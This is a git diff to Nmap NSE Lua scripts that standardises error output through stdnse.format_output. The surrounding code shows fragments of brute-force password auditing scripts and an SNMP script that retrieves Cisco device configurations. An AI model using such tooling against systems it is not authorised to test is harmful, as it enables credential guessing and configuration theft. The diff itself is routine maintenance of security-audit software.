100644 --- a/scripts/smbv2-enabled.nse +++ b/scripts/smbv2-enabled.nse @@ -1,6 +1,7 @@ local nmap = require "nmap" local smb = require "smb" local string = require "string" +local stdnse = require "stdnse" description = [[ Checks whether or not a server is running the SMBv2 protocol. @@ -55,11 +56,7 @@ action = function(host) local status, result, flag = go(host) if(not(status)) then - if(nmap.debugging() > 0) then - return "ERROR: " .. result - else - return nil - end + return stdnse.format_output(false, result) end return flag, result diff --git a/scripts/smtp-brute.nse b/scripts/smtp-brute.nse index f30364bf3..dd5bae959 100644 --- a/scripts/smtp-brute.nse +++ b/scripts/smtp-brute.nse @@ -100,16 +100,17 @@ Driver = } +local function fail (err) return stdnse.format_output(false, err) end action = function(host, port) local socket, response = smtp.connect(host, port, { ssl = true, recv_before = true }) - if ( not(socket) ) then return "\n ERROR: Failed to connect to SMTP server" end + if ( not(socket) ) then return fail("Failed to connect to SMTP server") end local status, response = smtp.ehlo(socket, smtp.get_domain(host)) - if ( not(status) ) then return "\n ERROR: EHLO command failed, aborting ..." end + if ( not(status) ) then return fail("EHLO command failed, aborting ...") end local mechs = smtp.get_auth_mech(response) if ( not(mechs) ) then - return "\n ERROR: Failed to retrieve authentication mechanisms form server" + return fail("Failed to retrieve authentication mechanisms form server") end smtp.quit(socket) diff --git a/scripts/snmp-brute.nse b/scripts/snmp-brute.nse index 8a358314e..a1bfee52f 100644 --- a/scripts/snmp-brute.nse +++ b/scripts/snmp-brute.nse @@ -221,11 +221,13 @@ local sniff_snmp_responses = function(host, port, lport, result) return end +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) local status, nextcommunity = communities() if not status then - return "\n ERROR: Failed to read the communities database" + return fail("Failed to read the communities database") end local result = {} @@ -241,12 +243,12 @@ action = function(host, port) status = socket:connect(host, port) if ( not(status) ) then - return "\n ERROR: Failed to connect to server" + return fail("Failed to connect to server") end local status, _, lport = socket:get_info() if( not(status) ) then - return "\n ERROR: Failed to retrieve local port" + return fail("Failed to retrieve local port") end local recv_co = stdnse.new_thread(sniff_snmp_responses, host, port, lport, result) diff --git a/scripts/snmp-ios-config.nse b/scripts/snmp-ios-config.nse index 346fe6344..588e86e49 100644 --- a/scripts/snmp-ios-config.nse +++ b/scripts/snmp-ios-config.nse @@ -46,6 +46,7 @@ dependencies = {"snmp-brute"} portrule = shortport.portnumber(161, "udp", {"open", "open|filtered"}) +local function fail (err) return stdnse.format_output(false, err) end --- -- Sends SNMP packets to host and reads responses action = function(host, port) @@ -53,7 +54,7 @@ action = function(host, port) local tftproot = stdnse.get_script_args("snmp-ios-config.tftproot") if ( tftproot and not( tftproot:match("[\\/]+$") ) ) then - return "ERROR: tftproot needs to end with slash" + return fail("tftproot needs to end with slash") end local snmpHelper = snmp.Helper:new(host, port) @@ -61,7 +62,7 @@ action = function(host, port) local status, tftpserver, _, _, _ = snmpHelper.socket:get_info() if( not(status) ) then - return "ERROR: Failed to determine local ip" + return fail("Failed to determine local ip") end -- build a SNMP v1 packet @@ -138,7 +139,7 @@ action = function(host, port) status, response = snmpHelper:get({reqId=28428}, ".1.3.6.1.4.1.9.9.96.1.1.1.1.10.9999") if (not status) or (response == "TIMEOUT") then - return "\n ERROR: Failed to receive cisco configuration file" + return fail("Failed to receive cisco configuration file") end local result = response and response[1] and response[1][1] @@ -156,7 +157,7 @@ action = function(host, port) file:write(result) file:close() else - return "\n ERROR: " .. file + return fail(file) end result = ("\n Configuration saved to (%s)"):format(fname) end diff --git a/scripts/socks-brute.nse b/scripts/socks-brute.nse index eccb2f30d..5672334f4 100644 --- a/scripts/socks-brute.nse +++ b/scripts/socks-brute.nse @@ -2,6 +2,7 @@ local brute = require "brute" local creds = require "creds" local shortport = require "shortport" local socks = require "socks" +local stdnse = require "stdnse" description = [[ Performs brute force password auditing against SOCKS 5 proxy servers. @@ -79,7 +80,7 @@ local function checkAuth(host, port) local status, err = helper:authenticate({username="nmap", password="nmapbruteprobe"}) if ( err ~= "Authentication failed" ) then - return false, ("\n ERROR: %s"):format(err) + return false, err end helper:close() @@ -90,7 +91,7 @@ action = function(host, port) local status, response = checkAuth(host, port) if ( not(status) ) then - return response + return stdnse.format_output(false, response) end local engine = brute.Engine:new(Driver, host, port) diff --git a/scripts/stun-info.nse b/scripts/stun-info.nse index aea3bd6a8..7fcd5504e 100644 --- a/scripts/stun-info.nse +++ b/scripts/stun-info.nse @@ -1,6 +1,7 @@ local nmap = require "nmap" local shortport = require "shortport" local stun = require "stun" +local stdnse = require "stdnse" description = [[ Retrieves the external IP address of a NAT:ed host using the STUN protocol. @@ -24,7 +25,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(3478, "stun", "udp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) local helper = stun.Helper:new(host, port) diff --git a/scripts/stun-version.nse b/scripts/stun-version.nse index 771c0f9bb..2c8e706bd 100644 --- a/scripts/stun-version.nse +++ b/scripts/stun-version.nse @@ -1,6 +1,7 @@ local nmap = require "nmap" local shortport = require "shortport" local stun = require "stun" +local stdnse = require "stdnse" description = [[ Sends a binding request to the server and attempts to extract version @@ -22,7 +23,7 @@ categories = {"version"} portrule = shortport.version_port_or_service(3478, "stun", "udp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) local helper = stun.Helper:new(host, port) diff --git a/scripts/telnet-encryption.nse b/scripts/telnet-encryption.nse index e7371653c..7648fd5c8 100644 --- a/scripts/telnet-encryption.nse +++ b/scripts/telnet-encryption.nse @@ -1,6 +1,7 @@ local bin = require "bin" local nmap = require "nmap" local shortport = require "shortport" +local stdnse = require "stdnse" local table = require "table" description = [[ @@ -70,6 +71,8 @@ local function processOptions(data) return true, { done=( not(#data == pos - 1) ), cmds = result } end +local function fail(err) return stdnse.format_output(false, err) end + action = function(host, port) local socket = nmap.new_socket() @@ -80,17 +83,17 @@ action = function(host, port) socket:set_timeout(7500) status, result = socket:send(data) if ( not(status) ) then - return ("\n ERROR: Failed to send packet: %s"):format(result) + return fail(("Failed to send packet: %s"):format(result)) end repeat status, data = socket:receive() if ( not(status) ) then - return ("\n ERROR: Receiving packet: %s"):format(data) + return fail(("Receiving packet: %s"):format(data)) end status, result = processOptions(data) if ( not(status) ) then - return "\n ERROR: Failed to process telnet options" + return fail("Failed to process telnet options") end until( result.done or result.cmds['26'] ) diff --git a/scripts/versant-info.nse b/scripts/versant-info.nse index 4c8e7b2f4..d37bb8ec6 100644 --- a/scripts/versant-info.nse +++ b/scripts/versant-info.nse @@ -44,7 +44,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(5019, "versant", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/vmauthd-brute.nse b/scripts/vmauthd-brute.nse index 0f9dc762e..a1896ca3a 100644 --- a/scripts/vmauthd-brute.nse +++ b/scripts/vmauthd-brute.nse @@ -2,6 +2,7 @@ local brute = require "brute" local creds = require "creds" local nmap = require "nmap" local shortport = require "shortport" +local stdnse = require "stdnse" description = [[ Performs brute force password auditing against the VMWare Authentication Daemon (vmware-authd). @@ -28,8 +29,7 @@ categories = {"brute", "intrusive"} portrule = shortport.port_or_service(902, {"ssl/vmware-auth", "vmware-auth"}, "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err) end - +local function fail(err) return stdnse.format_output(false, err) end Driver = { new = function(self, host, port, options) diff --git a/scripts/vnc-info.nse b/scripts/vnc-info.nse index 36c15f7da..55c038bc8 100644 --- a/scripts/vnc-info.nse +++ b/scripts/vnc-info.nse @@ -41,6 +41,8 @@ categories = {"default", "discovery", "safe"} portrule = shortport.port_or_service( {5900, 5901, 5902} , "vnc", "tcp", "open") +local function fail(err) return stdnse.format_output(false, err) end + action = function(host, port) local vnc = vnc.VNC:new( host, port ) @@ -48,13 +50,13 @@ action = function(host, port) local result = stdnse.output_table() status, data = vnc:connect() - if ( not(status) ) then return " \n ERROR: " .. data end + if ( not(status) ) then return fail(data) end status, data = vnc:handshake() - if ( not(status) ) then return " \n ERROR: " .. data end + if ( not(status) ) then return fail(data) end status, data = vnc:getSecTypesAsTable() - if ( not(status) ) then return " \n ERROR: " .. data end + if ( not(status) ) then return fail(data) end result["Protocol version"] = vnc:getProtocolVersion() diff --git a/scripts/voldemort-info.nse b/scripts/voldemort-info.nse index 3ded75c39..9ef29e02c 100644 --- a/scripts/voldemort-info.nse +++ b/scripts/voldemort-info.nse @@ -44,7 +44,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(6666, "vp3", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end -- Connect to the server and make sure it supports the vp3 protocol -- @param host table as received by the action method diff --git a/scripts/vuze-dht-info.nse b/scripts/vuze-dht-info.nse index 5b9c88f3e..ea277d147 100644 --- a/scripts/vuze-dht-info.nse +++ b/scripts/vuze-dht-info.nse @@ -55,13 +55,13 @@ local function getDHTInfo(host, port, lhost) local status = helper:connect() if ( not(status) ) then - return false, "\n ERROR: Failed to connect to server" + return false, "Failed to connect to server" end local response status, response = helper:ping() if ( not(status) ) then - return false, "\n ERROR: Failed to ping vuze node" + return false, "Failed to ping vuze node" end helper:close() @@ -71,6 +71,9 @@ end action = function(host, port) local status, response = getDHTInfo(host, port) + if not status then + return stdnse.format_output(false, response) + end -- check whether we have an error due to an incorrect address -- ie. we're on a NAT:ed network and we're announcing our private ip diff --git a/scripts/xdmcp-discover.nse b/scripts/xdmcp-discover.nse index 29522423f..8b538e13c 100644 --- a/scripts/xdmcp-discover.nse +++ b/scripts/xdmcp-discover.nse @@ -29,7 +29,7 @@ categories = {"safe", "discovery"} portrule = shortport.port_or_service(177, "xdmcp", "udp") local mutex = nmap.mutex("xdmcp-discover") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/xmpp-brute.nse b/scripts/xmpp-brute.nse index b1c330f44..c8c88373c 100644 --- a/scripts/xmpp-brute.nse +++ b/scripts/xmpp-brute.nse @@ -102,6 +102,7 @@ Driver = } +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) @@ -109,12 +110,12 @@ action = function(host, port) local helper = xmpp.Helper:new(host, port, options) local status, err = helper:connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to XMPP server" + return fail("Failed to connect to XMPP server") end local mechs = helper:getAuthMechs() if ( not(mechs) ) then - return "\n ERROR: Failed to retrieve authentication mechs from XMPP server" + return fail("Failed to retrieve authentication mechs from XMPP server") end local mech_prio = stdnse.get_script_args("xmpp-brute.auth") @@ -128,7 +129,7 @@ action = function(host, port) end if ( not(mech) ) then - return "\n ERROR: Failed to find suitable authentication mechanism" + return fail("Failed to find suitable authentication mechanism") end local engine = brute.Engine:new(Driver, host, port, options)